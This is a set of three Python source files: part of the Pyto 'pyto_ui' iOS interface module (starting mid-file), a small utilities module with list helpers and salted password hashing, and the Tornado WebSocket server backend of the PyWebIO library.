def thumb_color(self) -> Color:
"""
The color used to tint the appearance of the thumb.
:rtype: Color
"""
c = self.__py_view__.thumbColor
if c is None:
return None
else:
return Color(c)
@thumb_color.setter
def thumb_color(self, new_value: Color):
if new_value is None:
self.__py_view__.thumbColor = None
else:
self.__py_view__.thumbColor = new_value.__py_color__
class Button(Control):
"""
A control that executes your custom code in response to user interactions.
To add an action, set :data:`~pyto_ui.Control.action`.
For types of buttons, see `Button Type <constants.html#button-type>`_ constants.
"""
def __init__(
self,
type: BUTTON_TYPE = __v__("BUTTON_TYPE_SYSTEM"),
title: str = "",
image: "Image" = None,
):
if type == "BUTTON_TYPE_SYSTEM":
self.__py_view__ = __PyButton__.newButtonWithType(BUTTON_TYPE_SYSTEM)
else:
self.__py_view__ = __PyButton__.newButtonWithType(type)
self.__py_view__.managedValue = _values.value(self)
self.title = title
self.image = image
@property
def title(self) -> str:
"""
The title of the button.
:rtype: str
"""
title = self.__py_view__.title
if title is not None:
return str(title)
else:
return None
@title.setter
def title(self, new_value: str):
self.__py_view__.title = new_value
@property
def title_color(self) -> Color:
"""
The color of the title.
:rtype: Color
"""
c = self.__py_view__.titleColor
if c is None:
return None
else:
return Color(c)
@title_color.setter
def title_color(self, new_value: Color):
if new_value is None:
self.__py_view__.titleColor = None
else:
self.__py_view__.titleColor = new_value.__py_color__
@property
def image(self) -> "Image":
"""
The image displayed on the button. Can be a ``PIL`` image or a ``UIKit`` symbol image. For more information about symbols, see :func:`~pyto_ui.image_with_system_name`.
:rtype: PIL.Image.Image
"""
ui_image = self.__py_view__.image
if ui_image is None:
return None
elif ui_image.symbolImage:
return ui_image
else:
return __pil_image_from_ui_image__(ui_image)
@image.setter
def image(self, new_value: "Image"):
if new_value is None:
self.__py_view__.image = None
elif "objc_class" in dir(new_value) and new_value.objc_class == UIImage:
self.__py_view__.image = new_value
else:
self.__py_view__.image = __ui_image_from_pil_image__(new_value)
@property
def font(self) -> Font:
"""
The font to be applied to the text.
:rtype: Font
"""
py_font = self.__py_view__.font
if py_font is None:
return None
font = Font(None, None)
font.__ui_font__ = py_font
return font
@font.setter
def font(self, new_value: Font):
if new_value is None:
self.__py_view__.font = None
else:
self.__py_view__.font = new_value.__ui_font__
class TextField(Control):
"""
A field to type single line text.
The function passed to :data:`~pyto_ui.Control.action` will be called when the text field changes its text.
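Example (a minimal usage sketch):
.. highlight:: python
.. code-block:: python
import pyto_ui as ui
def text_changed(sender):
print(sender.text)
field = ui.TextField(placeholder="Name")
field.action = text_changed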
"""
def __init__(self, text: str = "", placeholder: str = None):
self.__py_view__ = __PyTextField__.newView()
self.__py_view__.managedValue = _values.value(self)
self.text = text
self.placeholder = placeholder
@property
def border_style(self) -> TEXT_FIELD_BORDER_STYLE:
return self.__py_view__.borderStyle
@border_style.setter
def border_style(self, new_value: TEXT_FIELD_BORDER_STYLE):
self.__py_view__.borderStyle = new_value
@property
def did_begin_editing(self) -> Callable[[TextField], None]:
"""
A function called when the Text Field begins editing. Takes the sender Text Field as parameter.
:rtype: Callable[[TextField], None]
"""
action = self.__py_view__.didBeginEditing
if action is None:
return None
else:
return getattr(_values, str(action.identifier))
@did_begin_editing.setter
def did_begin_editing(self, new_value: Callable[[TextField], None]):
if new_value is None:
self.__py_view__.didBeginEditing = None
else:
self.__py_view__.didBeginEditing = _values.value(new_value)
@property
def did_end_editing(self) -> Callable[[TextField], None]:
"""
A function called when the Text Field ends editing. Takes the sender Text Field as parameter.
:rtype: Callable[[TextField], None]
"""
action = self.__py_view__.didEndEditing
if action is None:
return None
else:
return getattr(_values, str(action.identifier))
@did_end_editing.setter
def did_end_editing(self, new_value: Callable[[TextField], None]):
if new_value is None:
self.__py_view__.didEndEditing = None
else:
self.__py_view__.didEndEditing = _values.value(new_value)
@property
def text(self) -> str:
"""
The text contained in the Text Field.
:rtype: str
"""
return str(self.__py_view__.text)
@text.setter
def text(self, new_value: str):
self.__py_view__.text = new_value
@property
def placeholder(self) -> str:
"""
Gray placeholder text shown when the Text Field is empty.
:rtype: str
"""
return str(self.__py_view__.placeholder)
@placeholder.setter
def placeholder(self, new_value: str):
self.__py_view__.placeholder = new_value
@property
def text_color(self) -> Color:
"""
The color of the text displayed on screen.
:rtype: Color
"""
c = self.__py_view__.textColor
if c is None:
return None
else:
return Color(c)
@text_color.setter
def text_color(self, new_value: Color):
if new_value is None:
self.__py_view__.textColor = None
else:
self.__py_view__.textColor = new_value.__py_color__
@property
def font(self) -> Font:
"""
The font of the text displayed on screen.
:rtype: Font
"""
py_font = self.__py_view__.font
if py_font is None:
return None
font = Font(None, None)
font.__ui_font__ = py_font
return font
@font.setter
def font(self, new_value: Font):
if new_value is None:
self.__py_view__.font = None
else:
self.__py_view__.font = new_value.__ui_font__
@property
def text_alignment(self) -> TEXT_ALIGNMENT:
"""
The alignment of the text displayed on screen. See `Text Alignment <constants.html#text-alignment>`_ constants for possible values.
:rtype: `Text Alignment <constants.html#text-alignment>`_
"""
return self.__py_view__.textAlignment
@text_alignment.setter
def text_alignment(self, new_value: TEXT_ALIGNMENT):
self.__py_view__.textAlignment = new_value
@property
def smart_dashes(self) -> bool:
"""
A boolean indicating whether smart dashes are enabled.
:rtype: bool
"""
return self.__py_view__.smartDashes
@smart_dashes.setter
def smart_dashes(self, new_value: bool):
self.__py_view__.smartDashes = new_value
@property
def smart_quotes(self) -> bool:
"""
A boolean indicating whether smart quotes are enabled.
:rtype: bool
"""
return self.__py_view__.smartQuotes
@smart_quotes.setter
def smart_quotes(self, new_value: bool):
self.__py_view__.smartQuotes = new_value
@property
def keyboard_type(self) -> KEYBOARD_TYPE:
"""
The type of keyboard to use while editing the text. See `Keyboard Type <constants.html#keyboard-type>`_ constants for possible values.
:rtype: `Keyboard Type <constants.html#keyboard-type>`_
"""
return self.__py_view__.keyboardType
@keyboard_type.setter
def keyboard_type(self, new_value: KEYBOARD_TYPE):
self.__py_view__.keyboardType = new_value
@property
def autocapitalization_type(self) -> AUTO_CAPITALIZE:
"""
The type of autocapitalization to use while editing the text. See `Auto Capitalization <constants.html#auto-capitalization>`_ constants for possible values.
:rtype: `Auto Capitalization <constants.html#auto-capitalization>`_
"""
return self.__py_view__.autocapitalizationType
@autocapitalization_type.setter
def autocapitalization_type(self, new_value: AUTO_CAPITALIZE):
self.__py_view__.autocapitalizationType = new_value
@property
def autocorrection(self) -> bool:
"""
A boolean indicating whether autocorrection is enabled.
:rtype: bool
"""
return self.__py_view__.autocorrection
@autocorrection.setter
def autocorrection(self, new_value: bool):
self.__py_view__.autocorrection = new_value
@property
def keyboard_appearance(self) -> KEYBOARD_APPEARANCE:
"""
The appearance of the keyboard used while editing the text. See `Keyboard Appearance <constants.html#keyboard-appearance>`_ constants for possible values.
:rtype: `Keyboard Appearance <constants.html#keyboard-appearance>`_
"""
return self.__py_view__.keyboardAppearance
@keyboard_appearance.setter
def keyboard_appearance(self, new_value: KEYBOARD_APPEARANCE):
self.__py_view__.keyboardAppearance = new_value
@property
def return_key_type(self) -> RETURN_KEY_TYPE:
"""
The type of return key to show on the keyboard used to edit the text. See `Return Key Type <constants.html#return-key-type>`_ constants for possible values.
:rtype: `Return Key Type <constants.html#return-key-type>`_
"""
return self.__py_view__.returnKeyType
@return_key_type.setter
def return_key_type(self, new_value: RETURN_KEY_TYPE):
self.__py_view__.returnKeyType = new_value
@property
def secure(self) -> bool:
"""
A boolean indicating whether the keyboard should be configured to enter sensitive data. The text entered by the user will be hidden.
:rtype: bool
"""
return self.__py_view__.isSecureTextEntry
@secure.setter
def secure(self, new_value: bool):
self.__py_view__.isSecureTextEntry = new_value
###################
# MARK: - Functions
###################
def __ui_image_from_pil_image__(image):
if image is None:
return None
with BytesIO() as buffered:
image.save(buffered, format='PNG')
img_str = base64.b64encode(buffered.getvalue())
data = __NSData__.alloc().initWithBase64EncodedString(img_str, options=0)
return UIImage.alloc().initWithData(data)
def __pil_image_from_ui_image__(image):
from PIL import Image
if image is None:
return None
img_str = str(image.data.base64EncodedStringWithOptions(0))
msg = base64.b64decode(img_str)
return Image.open(BytesIO(msg))
def font_family_names() -> List[str]:
"""
Returns all font family names that can be used to initialize a font.
:rtype: List[str]
"""
names = __UIFont__.familyNames
py_names = []
for name in names:
py_names.append(str(name))
return py_names
def image_with_system_name(name: str) -> UIImage:
"""
Returns a system symbol image from the given name. The return value is a UIKit ``UIImage`` object, so it can only be used with the ``pyto_ui`` library.
More info about symbols on `Apple's Web Site <https://developer.apple.com/design/resources/>`_ .
:param name: The name of the SF Symbol.
:rtype: UIImage
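Example (a minimal sketch; "trash" is assumed to be a valid SF Symbol name):
.. highlight:: python
.. code-block:: python
import pyto_ui as ui
image = ui.image_with_system_name("trash")
button = ui.Button(image=image)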
"""
image = UIImage.systemImageNamed(name, withConfiguration=None)
if image is None:
raise ValueError("The given symbol name is not valid.")
return image
def show_view(view: View, mode: PRESENTATION_MODE):
"""
Presents the given view.
This function doesn't return until the view is closed. You can use another thread to perform background tasks and modify the UI after it's presented.
On iPad, if the view has a custom size, it will be used for the presentation.
:param view: The :class:`~pyto_ui.View` object to present.
:param mode: The presentation mode to use. The value will be ignored on a widget. See `Presentation Mode <constants.html#presentation-mode>`_ constants for possible values.
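Example (a minimal sketch; ``PRESENTATION_MODE_SHEET`` is assumed to be one of the documented presentation mode constants):
.. highlight:: python
.. code-block:: python
import pyto_ui as ui
view = ui.View()
view.title = "My View"
ui.show_view(view, ui.PRESENTATION_MODE_SHEET)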
"""
def show(view, mode):
view.__py_view__.presentationMode = mode
try:
ConsoleViewController.showView(
view.__py_view__, onConsoleForPath=threading.current_thread().script_path
)
except AttributeError:
ConsoleViewController.showView(view.__py_view__, onConsoleForPath=None)
while view.__py_view__.isPresented:
sleep(0.2)
if ("__editor_delegate__" in dir(builtins) and builtins.__editor_delegate__ is not None):
global show_view
_show_view = show_view
show_view = show
try:
builtins.__editor_delegate__.show_ui(view, mode)
return
except NotImplementedError:
pass
finally:
show_view = _show_view
show(view, mode)
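# A minimal, hedged usage sketch (not part of the original module): presenting a bare
# View with show_view(). PRESENTATION_MODE_SHEET is assumed to be one of the module's
# Presentation Mode constants; substitute whichever constant is actually available.
#
#   import pyto_ui as ui
#
#   view = ui.View()
#   ui.show_view(view, ui.PRESENTATION_MODE_SHEET)  # blocks until the view is closed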
|
utils.py
|
#!/usr/bin/env python
"""
utils.py
Created by Jason Sundram, on 2010-04-05.
Copyright (c) 2010 The Echo Nest. All rights reserved.
Expanded by Chris Angelico in 2014 with additional utilities.
"""
from __future__ import print_function
import threading, os
import binascii
import hashlib
import collections
import random
def flatten(l):
""" Converts a list of tuples to a flat list.
e.g. flatten([(1,2), (3,4)]) => [1,2,3,4]
"""
return [item for pair in l for item in pair]
def tuples(l, n=2):
""" returns n-tuples from l.
e.g. tuples(range(4), n=2) -> [(0, 1), (1, 2), (2, 3)]
"""
return zip(*[l[i:] for i in range(n)])
def rows(m):
"""returns the # of rows in a numpy matrix"""
return m.shape[0]
magic_log = None
class Magic_Str(str):
"""Callable string. If called, it returns itself with () appended.
It's also able to be treated as an integer (it'll be zero).
"""
def __call__(self, *args, **kw):
print(self+"()", file=magic_log); magic_log.flush()
return self+"()"
def __int__(self): return 0
def __index__(self): return 0
class Magic_Anything(object):
"""
Magic class that has every possible method/attribute
Actually, there are no methods, per se. When any attribute is sought,
a Magic_Str() will be returned.
"""
    def __init__(self, id):
        global magic_log  # magic_log is assigned below, so without this it would be treated as a local
        self._id = id
        if not magic_log: magic_log = open("magic.log", "w")
def __repr__(self):
return "Magic_Anything(" + repr(self._id) + ")"
def __getattribute__(self, name):
if name == "id": return self._id
if name.startswith("_"): return object.__getattribute__(self, name)
print(repr(self) + "." + name, file=magic_log); magic_log.flush()
return Magic_Str(repr(self) + "." + name)
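# A small, hedged usage sketch: Magic_Anything logs every attribute access to magic.log
# and hands back a Magic_Str, so arbitrary attribute/method chains "succeed" silently
# while leaving a trace of what was requested.
#
#   obj = Magic_Anything("player")
#   obj.play()                 # logs Magic_Anything('player').play, then ...play()
#   volume = int(obj.volume)   # Magic_Str coerces to 0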
def shuffler(func, gen):
"""Call func(next(gen)) repeatedly.
TODO: Should this become for x in gen: func(x) ?
Currently, a StopIteration will bubble unexpectedly.
Not currently used.
"""
while True:
func(next(gen))
def daemonize(target, *args):
"""Start a daemon thread to call target(*args)."""
t = threading.Thread(target=target, args=args)
t.daemon = True
t.start()
def random_hex():
return binascii.b2a_hex(os.urandom(8)).decode("ascii")
def hash_password(password):
    if isinstance(password, str): password = password.encode("ascii")  # accept str or bytes, as check_password does
    salt = os.urandom(16)
    hash = hashlib.sha256(salt + password).hexdigest()
    return binascii.hexlify(salt).decode("ascii") + "-" + hash
def check_password(pwd, password):
if isinstance(pwd, str): pwd = pwd.encode("ascii")
if isinstance(password, str): password = password.encode("ascii")
if b"-" not in pwd: return False
salt, hash = pwd.split(b"-", 1)
return hashlib.sha256(binascii.unhexlify(salt)+password).hexdigest().encode("ascii") == hash
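# A minimal, hedged usage sketch: the stored value is "<hex salt>-<sha256 hex digest>",
# and check_password() re-hashes the candidate password with the stored salt.
#
#   stored = hash_password("hunter2")
#   assert check_password(stored, "hunter2")
#   assert not check_password(stored, "wrong")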
def alphabetize_ignore_the(list_of_names):
"""Return alphabetized list of names, ignoring the word "The" in alphabetization.
TODO: Use a standard locale-based ordering function.
"""
ordered_object = {}
    # TODO: abstract this loop and remove the repetition (it's rather WET)
for item in list_of_names:
if item[0][:4].lower() == 'the ':
ordered_object[item[0][4:].upper()] = ('', item[0])
elif len(item[0].split(',')) > 1:
# if item contains a comma, split into Last, First
the_item = item[0].split(',')
the_item[1] = the_item[1].lstrip()
# Add a random number so duplicate names don't break this
# seems like a bit of a hack. This whole approach is probably
# less ideal than a really well composed database query.
# Random names shouldn't be necessary as other two conditions
# return unique values from the db.
ordered_object[the_item[0].upper()+str(random.random())] = the_item
else:
ordered_object[item[0].upper()] = ('', item[0])
return collections.OrderedDict(sorted(ordered_object.items()))
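# A hedged usage sketch for alphabetize_ignore_the(). Each item is expected to be a
# sequence whose first element is the display name (e.g. a row from a DB query):
#
#   names = [("The Beatles",), ("Adele",), ("Bowie, David",)]
#   ordered = alphabetize_ignore_the(names)
#   # Keys are uppercased sort keys; values are ('', name) pairs or [last, first] lists,
#   # roughly: {'ADELE': ('', 'Adele'), 'BEATLES': ('', 'The Beatles'), 'BOWIE<random>': ['Bowie', 'David']}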
|
tornado.py
|
import asyncio
import fnmatch
import json
import logging
import os
import threading
import time
import webbrowser
from functools import partial
from typing import Dict
from urllib.parse import urlparse
import tornado
import tornado.httpserver
import tornado.ioloop
from tornado.web import StaticFileHandler
from tornado.websocket import WebSocketHandler
from . import page
from .remote_access import start_remote_access_service
from .page import make_applications, render_page
from .utils import cdn_validation, deserialize_binary_event, print_listen_address
from ..session import CoroutineBasedSession, ThreadBasedSession, ScriptModeSession, \
register_session_implement_for_target, Session
from ..session.base import get_session_info_from_headers
from ..utils import get_free_port, wait_host_port, STATIC_PATH, iscoroutinefunction, isgeneratorfunction, \
check_webio_js, parse_file_size, random_str, LRUDict
logger = logging.getLogger(__name__)
_ioloop = None
def set_ioloop(loop):
global _ioloop
_ioloop = loop
def ioloop() -> tornado.ioloop.IOLoop:
"""获得运行Tornado server的IOLoop
本方法当前仅在显示boken app时使用
This method is currently only used when displaying boken app"""
global _ioloop
return _ioloop
def _check_origin(origin, allowed_origins, handler: WebSocketHandler):
if _is_same_site(origin, handler):
return True
return any(
fnmatch.fnmatch(origin, pattern)
for pattern in allowed_origins
)
def _is_same_site(origin, handler: WebSocketHandler):
parsed_origin = urlparse(origin)
origin = parsed_origin.netloc
origin = origin.lower()
host = handler.request.headers.get("Host")
# Check to see that origin matches host directly, including ports
return origin == host
def _webio_handler(applications=None, cdn=True, reconnect_timeout=0, check_origin_func=_is_same_site): # noqa: C901
"""
:param dict applications: dict of `name -> task function`
:param bool/str cdn: Whether to load front-end static resources from CDN
:param callable check_origin_func: check_origin_func(origin, handler) -> bool
:return: Tornado RequestHandler class
"""
check_webio_js()
if applications is None:
applications = dict(index=lambda: None) # mock PyWebIO app
class WSHandler(WebSocketHandler):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self._close_from_session = False
self.session_id = None
self.session = None # type: Session
if reconnect_timeout and not type(self)._started_clean_task:
type(self)._started_clean_task = True
tornado.ioloop.IOLoop.current().call_later(reconnect_timeout // 2, type(self).clean_expired_sessions)
logger.debug("Started session clean task")
def get_app(self):
app_name = self.get_query_argument('app', 'index')
app = applications.get(app_name) or applications['index']
return app
def get_cdn(self):
if cdn is True and self.get_query_argument('_pywebio_cdn', '') == 'false':
return False
return cdn
async def get(self, *args, **kwargs) -> None:
# It's a simple http GET request
if self.request.headers.get("Upgrade", "").lower() != "websocket":
# Backward compatible
# Frontend detect whether the backend is http server
if self.get_query_argument('test', ''):
return self.write('')
app = self.get_app()
html = render_page(app, protocol='ws', cdn=self.get_cdn())
return self.write(html)
else:
await super().get()
def check_origin(self, origin):
return check_origin_func(origin=origin, handler=self)
def get_compression_options(self):
# Non-None enables compression with default options.
return {}
@classmethod
def clean_expired_sessions(cls):
tornado.ioloop.IOLoop.current().call_later(reconnect_timeout // 2, cls.clean_expired_sessions)
while cls._session_expire:
                session_id, expire_ts = cls._session_expire.popitem(last=False)  # pop the session that expires earliest
if time.time() < expire_ts:
# this session is not expired
cls._session_expire[session_id] = expire_ts # restore this item
cls._session_expire.move_to_end(session_id, last=False) # move to front
break
# clean this session
logger.debug("session %s expired" % session_id)
cls._connections.pop(session_id, None)
session = cls._webio_sessions.pop(session_id, None)
if session:
session.close(nonblock=True)
@classmethod
def send_msg_to_client(cls, _, session_id=None):
conn = cls._connections.get(session_id)
session = cls._webio_sessions[session_id]
if not conn or not conn.ws_connection:
return
for msg in session.get_task_commands():
try:
conn.write_message(json.dumps(msg))
except TypeError as e:
logger.exception('Data serialization error: %s\n'
'This may be because you pass the wrong type of parameter to the function'
' of PyWebIO.\nData content: %s', e, msg)
@classmethod
def close_from_session(cls, session_id=None):
cls.send_msg_to_client(None, session_id=session_id)
conn = cls._connections.pop(session_id, None)
cls._webio_sessions.pop(session_id, None)
if conn and conn.ws_connection:
conn._close_from_session = True
conn.close()
_started_clean_task = False
_session_expire = LRUDict() # session_id -> expire timestamp. In increasing order of expire time
_webio_sessions = {} # type: Dict[str, Session] # session_id -> session
_connections = {} # type: Dict[str, WSHandler] # session_id -> WSHandler
def open(self):
logger.debug("WebSocket opened")
cls = type(self)
self.session_id = self.get_query_argument('session', None)
            if self.session_id in ('NEW', None):  # initial request: create a new Session
session_info = get_session_info_from_headers(self.request.headers)
session_info['user_ip'] = self.request.remote_ip
session_info['request'] = self.request
session_info['backend'] = 'tornado'
session_info['protocol'] = 'websocket'
application = self.get_app()
self.session_id = random_str(24)
cls._connections[self.session_id] = self
if iscoroutinefunction(application) or isgeneratorfunction(application):
self.session = CoroutineBasedSession(
application, session_info=session_info,
on_task_command=partial(self.send_msg_to_client, session_id=self.session_id),
on_session_close=partial(self.close_from_session, session_id=self.session_id))
else:
self.session = ThreadBasedSession(
application, session_info=session_info,
on_task_command=partial(self.send_msg_to_client, session_id=self.session_id),
on_session_close=partial(self.close_from_session, session_id=self.session_id),
loop=asyncio.get_event_loop())
cls._webio_sessions[self.session_id] = self.session
if reconnect_timeout:
self.write_message(json.dumps(dict(command='set_session_id', spec=self.session_id)))
elif self.session_id not in cls._webio_sessions: # WebIOSession deleted
self.write_message(json.dumps(dict(command='close_session')))
else:
self.session = cls._webio_sessions[self.session_id]
cls._session_expire.pop(self.session_id, None)
cls._connections[self.session_id] = self
cls.send_msg_to_client(self.session, self.session_id)
logger.debug('session id: %s' % self.session_id)
def on_message(self, message):
if isinstance(message, bytes):
event = deserialize_binary_event(message)
else:
event = json.loads(message)
if event is None:
return
self.session.send_client_event(event)
def on_close(self):
cls = type(self)
cls._connections.pop(self.session_id, None)
if not reconnect_timeout and not self._close_from_session:
self.session.close(nonblock=True)
elif reconnect_timeout:
if self._close_from_session:
cls._webio_sessions.pop(self.session_id, None)
elif self.session:
cls._session_expire[self.session_id] = time.time() + reconnect_timeout
logger.debug("WebSocket closed")
return WSHandler
def webio_handler(applications, cdn=True, reconnect_timeout=0, allowed_origins=None, check_origin=None):
"""Get the ``RequestHandler`` class for running PyWebIO applications in Tornado.
The ``RequestHandler`` communicates with the browser by WebSocket protocol.
The arguments of ``webio_handler()`` have the same meaning as for :func:`pywebio.platform.tornado.start_server`
"""
applications = make_applications(applications)
for target in applications.values():
register_session_implement_for_target(target)
cdn = cdn_validation(cdn, 'error') # if CDN is not available, raise error
if check_origin is None:
check_origin_func = partial(_check_origin, allowed_origins=allowed_origins or [])
else:
check_origin_func = lambda origin, handler: _is_same_site(origin, handler) or check_origin(origin)
return _webio_handler(applications=applications, cdn=cdn, check_origin_func=check_origin_func,
reconnect_timeout=reconnect_timeout)
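# A hedged usage sketch (not part of the original module): mounting the PyWebIO
# WebSocket handler in an existing Tornado application. `my_app` stands in for a
# PyWebIO task function defined elsewhere.
#
#   import tornado.web, tornado.ioloop
#   from pywebio.platform.tornado import webio_handler
#
#   application = tornado.web.Application([(r"/pywebio", webio_handler(my_app))])
#   application.listen(8080)
#   tornado.ioloop.IOLoop.current().start()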
async def open_webbrowser_on_server_started(host, port):
url = 'http://%s:%s' % (host, port)
is_open = await wait_host_port(host, port, duration=20)
if is_open:
logger.info('Try open %s in web browser' % url)
# webbrowser.open() may block, so invoke it in thread
threading.Thread(target=webbrowser.open, args=(url,), daemon=True).start()
else:
logger.error('Open %s in web browser failed.' % url)
def _setup_server(webio_handler, port=0, host='', static_dir=None, max_buffer_size=2 ** 20 * 200,
**tornado_app_settings):
if port == 0:
port = get_free_port()
handlers = [(r"/", webio_handler)]
if static_dir is not None:
handlers.append((r"/static/(.*)", StaticFileHandler, {"path": static_dir}))
handlers.append((r"/(.*)", StaticFileHandler, {"path": STATIC_PATH, 'default_filename': 'index.html'}))
app = tornado.web.Application(handlers=handlers, **tornado_app_settings)
# Credit: https://stackoverflow.com/questions/19074972/content-length-too-long-when-uploading-file-using-tornado
server = app.listen(port, address=host, max_buffer_size=max_buffer_size)
return server, port
def start_server(applications, port=0, host='',
debug=False, cdn=True, static_dir=None,
remote_access=False,
reconnect_timeout=0,
allowed_origins=None, check_origin=None,
auto_open_webbrowser=False,
max_payload_size='200M',
**tornado_app_settings):
"""Start a Tornado server to provide the PyWebIO application as a web service.
The Tornado server communicates with the browser by WebSocket protocol.
Tornado is the default backend server for PyWebIO applications,
and ``start_server`` can be imported directly using ``from pywebio import start_server``.
:param list/dict/callable applications: PyWebIO application.
Can be a task function, a list of functions, or a dictionary.
Refer to :ref:`Advanced topic: Multiple applications in start_server() <multiple_app>` for more information.
When the task function is a coroutine function, use :ref:`Coroutine-based session <coroutine_based_session>` implementation,
otherwise, use thread-based session implementation.
:param int port: The port the server listens on.
        When set to ``0``, the server will automatically select an available port.
:param str host: The host the server listens on. ``host`` may be either an IP address or hostname.
If it’s a hostname, the server will listen on all IP addresses associated with the name.
``host`` may be an empty string or None to listen on all available interfaces.
:param bool debug: Tornado Server's debug mode. If enabled, the server will automatically reload for code changes.
See `tornado doc <https://www.tornadoweb.org/en/stable/guide/running.html#debug-mode>`_ for more detail.
:param bool/str cdn: Whether to load front-end static resources from CDN, the default is ``True``.
Can also use a string to directly set the url of PyWebIO static resources.
:param str static_dir: The directory to store the application static files.
The files in this directory can be accessed via ``http://<host>:<port>/static/files``.
For example, if there is a ``A/B.jpg`` file in ``static_dir`` path,
it can be accessed via ``http://<host>:<port>/static/A/B.jpg``.
    :param bool remote_access: Whether to enable remote access. When enabled,
        a temporary public network address is generated for the current application,
        and others can access your application via this address.
    :param bool auto_open_webbrowser: Whether to automatically open a web browser when the server is started (if the operating system allows it).
:param int reconnect_timeout: The client can reconnect to server within ``reconnect_timeout`` seconds after an unexpected disconnection.
If set to 0 (default), once the client disconnects, the server session will be closed.
:param list allowed_origins: The allowed request source list. (The current server host is always allowed)
The source contains the protocol, domain name, and port part.
Can use Unix shell-style wildcards:
- ``*`` matches everything
- ``?`` matches any single character
- ``[seq]`` matches any character in *seq*
- ``[!seq]`` matches any character not in *seq*
        For example: ``https://*.example.com``, ``*://*.example.com``
        For details, see the `Python docs <https://docs.python.org/zh-tw/3/library/fnmatch.html>`_
:param callable check_origin: The validation function for request source.
It receives the source string (which contains protocol, host, and port parts) as parameter and
return ``True/False`` to indicate that the server accepts/rejects the request.
If ``check_origin`` is set, the ``allowed_origins`` parameter will be ignored.
:param int/str max_payload_size: Max size of a websocket message which Tornado can accept.
Messages larger than the ``max_payload_size`` (default 200MB) will not be accepted.
        ``max_payload_size`` can be an integer indicating the number of bytes, or a string ending with `K` / `M` / `G`
        (representing kilobytes, megabytes, and gigabytes, respectively).
        E.g.: ``500``, ``'40K'``, ``'3M'``
:param tornado_app_settings: Additional keyword arguments passed to the constructor of ``tornado.web.Application``.
For details, please refer: https://www.tornadoweb.org/en/stable/web.html#tornado.web.Application.settings
"""
set_ioloop(tornado.ioloop.IOLoop.current()) # to enable bokeh app
cdn = cdn_validation(cdn, 'warn') # if CDN is not available, warn user and disable CDN
page.MAX_PAYLOAD_SIZE = max_payload_size = parse_file_size(max_payload_size)
debug = Session.debug = os.environ.get('PYWEBIO_DEBUG', debug)
# Since some cloud server may close idle connections (such as heroku),
# use `websocket_ping_interval` to keep the connection alive
tornado_app_settings.setdefault('websocket_ping_interval', 30)
tornado_app_settings.setdefault('websocket_max_message_size', max_payload_size) # Backward compatible
tornado_app_settings['websocket_max_message_size'] = parse_file_size(
tornado_app_settings['websocket_max_message_size'])
tornado_app_settings['debug'] = debug
handler = webio_handler(applications, cdn, allowed_origins=allowed_origins, check_origin=check_origin,
reconnect_timeout=reconnect_timeout)
_, port = _setup_server(webio_handler=handler, port=port, host=host, static_dir=static_dir,
max_buffer_size=max_payload_size, **tornado_app_settings)
print_listen_address(host, port)
if auto_open_webbrowser:
tornado.ioloop.IOLoop.current().spawn_callback(open_webbrowser_on_server_started, host or 'localhost', port)
if remote_access:
start_remote_access_service(local_port=port)
tornado.ioloop.IOLoop.current().start()
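# A hedged usage sketch: the common entry point. `hello` is a hypothetical PyWebIO
# task function; any of the parameters documented above can be passed as well.
#
#   from pywebio import start_server
#   from pywebio.output import put_text
#
#   def hello():
#       put_text("Hello, PyWebIO!")
#
#   if __name__ == "__main__":
#       start_server(hello, port=8080, debug=True)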
def start_server_in_current_thread_session():
"""启动 script mode 的server,监听可用端口,并自动打开浏览器
Start the server for script mode, and automatically open the browser when the server port is available.
PYWEBIO_SCRIPT_MODE_PORT环境变量可以设置监听端口,并关闭自动打开浏览器,用于测试
The PYWEBIO_SCRIPT_MODE_PORT environment variable can set the listening port, just used in testing.
"""
websocket_conn_opened = threading.Event()
thread = threading.current_thread()
class SingleSessionWSHandler(_webio_handler(cdn=False)):
session = None
instance = None
closed = False
def open(self):
self.main_session = False
cls = type(self)
if SingleSessionWSHandler.session is None:
self.main_session = True
SingleSessionWSHandler.instance = self
self.session_id = 'main'
cls._connections[self.session_id] = self
session_info = get_session_info_from_headers(self.request.headers)
session_info['user_ip'] = self.request.remote_ip
session_info['request'] = self.request
session_info['backend'] = 'tornado'
session_info['protocol'] = 'websocket'
self.session = SingleSessionWSHandler.session = ScriptModeSession(
thread, session_info=session_info,
on_task_command=partial(self.send_msg_to_client, session_id=self.session_id),
loop=asyncio.get_event_loop())
websocket_conn_opened.set()
cls._webio_sessions[self.session_id] = self.session
else:
self.close()
def on_close(self):
if SingleSessionWSHandler.session is not None and self.main_session:
self.session.close()
self.closed = True
logger.debug('ScriptModeSession closed')
async def wait_to_stop_loop(server):
"""当只剩当前线程和Daemon线程运行时,关闭Server
When only the current thread and Daemon thread are running, close the Server"""
# 包括当前线程在内的非Daemon线程数
# The number of non-Daemon threads(including the current thread)
alive_none_daemonic_thread_cnt = None
while alive_none_daemonic_thread_cnt != 1:
alive_none_daemonic_thread_cnt = sum(
1 for t in threading.enumerate() if t.is_alive() and not t.isDaemon()
)
await asyncio.sleep(0.5)
if SingleSessionWSHandler.instance.session.need_keep_alive():
while not SingleSessionWSHandler.instance.closed:
await asyncio.sleep(0.5)
        # Close the WebSocket connection
if SingleSessionWSHandler.instance:
SingleSessionWSHandler.instance.close()
server.stop()
logger.debug('Closing tornado ioloop...')
tasks = [t for t in asyncio.all_tasks() if t is not asyncio.current_task() and not t.done()]
for task in tasks:
task.cancel()
        # The `await asyncio.sleep(0)` below is required; otherwise the `task.cancel()` calls above never get scheduled
await asyncio.sleep(0)
tornado.ioloop.IOLoop.current().stop()
def server_thread():
from tornado.log import access_log, app_log, gen_log
access_log.setLevel(logging.ERROR)
app_log.setLevel(logging.ERROR)
gen_log.setLevel(logging.ERROR)
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
set_ioloop(tornado.ioloop.IOLoop.current()) # to enable bokeh app
port = 0
if os.environ.get("PYWEBIO_SCRIPT_MODE_PORT"):
port = int(os.environ.get("PYWEBIO_SCRIPT_MODE_PORT"))
server, port = _setup_server(webio_handler=SingleSessionWSHandler, port=port, host='localhost',
websocket_max_message_size=parse_file_size('200M'))
tornado.ioloop.IOLoop.current().spawn_callback(partial(wait_to_stop_loop, server=server))
if "PYWEBIO_SCRIPT_MODE_PORT" not in os.environ:
tornado.ioloop.IOLoop.current().spawn_callback(open_webbrowser_on_server_started, 'localhost', port)
tornado.ioloop.IOLoop.current().start()
logger.debug('Tornado server exit')
t = threading.Thread(target=server_thread, name='Tornado-server')
t.start()
websocket_conn_opened.wait()
|